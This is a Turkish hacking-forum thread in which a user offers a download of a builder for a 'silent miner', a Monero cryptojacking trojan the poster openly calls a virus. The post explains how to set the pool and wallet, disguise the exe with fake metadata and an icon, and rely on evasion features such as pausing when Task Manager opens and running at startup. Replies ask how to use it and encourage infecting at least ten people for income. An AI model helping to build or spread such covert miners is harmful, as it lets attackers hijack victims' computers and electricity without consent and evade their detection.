Monero Silent Miner [Kendi silent miner'ınızı oluşturun]

xmrsilent

Yeni üye
23 Mar 2018
2
0
Öncelikle silent miner'ın ne işe yaradığından bahsedeyim. Bu kavrama yabancı olanlar olabilir. Slient miner bir virüstür. Arka planda çalışarak işlemcinin bir kısmını coin madenciliği için kullanır. Kullanıcıya zarar vermemek adına bu silent'ta işlemci kullanımını toloreli çalışacak biçimde ayarladım. Örneğin bir kullanıcı yüksek işlem gücü isteyen bir uygulama-oyun çalıştırırsa öncelik kullanıcının işlemine verilir ve miner'ın işlemci kullanım yüzdesi düşerek kullanıcıyı kısıtlamaz. Silent miner'larda genelde monero ismindeki coin tercih edilir. Bunun farklı sebepleri var monero'yu araştırmanızı tavsiye ederim. Coin üretimi için havuz ve cüzdana ihtiyacımız var. Havuz için önerim https://monero.crypto-pool.fr/ havuzudur. Cüzdan açma ve yönetme için çeşitli yöntemler var uğraşmak istemeyenler minergate gibi sistemlerden online cüzdan açabilirler.

Tavsiyem silent miner yaymak için acele etmeyin. Önce monero üretimi ve cüzdan yönetimi hakkında yeterli araştırmayı yapmalısınız. Github'da birçok normal miner var en az birini kullanarak önce kendi bilgisayarınızda kazmaya çalışın.


Ön yazının ardından bu konuya aşina olanlar için uygulama kullanımı açıklayayım.

XC464


Port ile birlikte havuz adresinizi, cüzdan adresinizi ve havuz şifresini girdikten sonra oluşacak exe için telif hakkı, açıklama ve ürün ismi bilgilerini de giriyoruz. İcon seçebiliyorsunuz. Bütün bilgileri girdikten sonra build butonuna tıklayarak silent miner için bir isim girip kaydediyorsunuz. Çalışıp çalışmadığını kontrol etmek için miner'ı vm'de denemenizi tavsiye ederim. Çift tıkladıktan sonra arka planda çalışmaya başlayacaktır. Havuz üzerinden hashrate'inizi kontrol edebilirsiniz.​

Özellikler:
*Görev yöneticisi açıldığında proses bekleme durumuna geçer.
*Başlangıçta çalışır.
*Fee %5 olarak ayarlanmıştır.
*İşlemcinin tamamını kullanmaz.
*miner c++ ile yazıldığı için .net framework'e ihtiyaç duymaz.

Görüşlerinizi, varsa sorularınızı ve tavsiyelerinizi bekliyorum.


[SIZE="4 [URL="https://tik.lat/Wlru8"] Virusscan[/URL]
Download
Rar şifresi: Türkiye[/SIZE]
 
Son düzenleme:

Casper 7

Yeni üye
25 Mar 2015
23
0
Görev yöneticisine girdikten biraz sonra duruyor birde başka yerlerden çalıştığı gözüküyor
 

Tetrox

Kıdemli Üye
14 Mar 2017
2,338
2
none
Kendi bilgisayarınzda kazmaya başlayın elektrik faturası 400 lira gelsin.
en az 10 kişiye yaymalısın ki aylık düzgün bir kazanç olsun gayet güzel.
 

CoreGG

Uzman üye
19 Nis 2016
1,567
2
Dünya
monero dışında başka coinlerde üretebilir miyiz hocam ? Birde deep freeze olan bilgisayarda başlangıçta çalışırmı ?
 

Daedalus

Üye
11 Tem 2015
216
0
Yararlı konu çok teşekkürler . Fakat bir soru sorucam diyelim ki karşıdaki kişinin işlem gücü çok düşük yinede kazım yapabilirmi az da olsa ? yoksa işlem gücü düşük olduğu için çalışmazmı
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.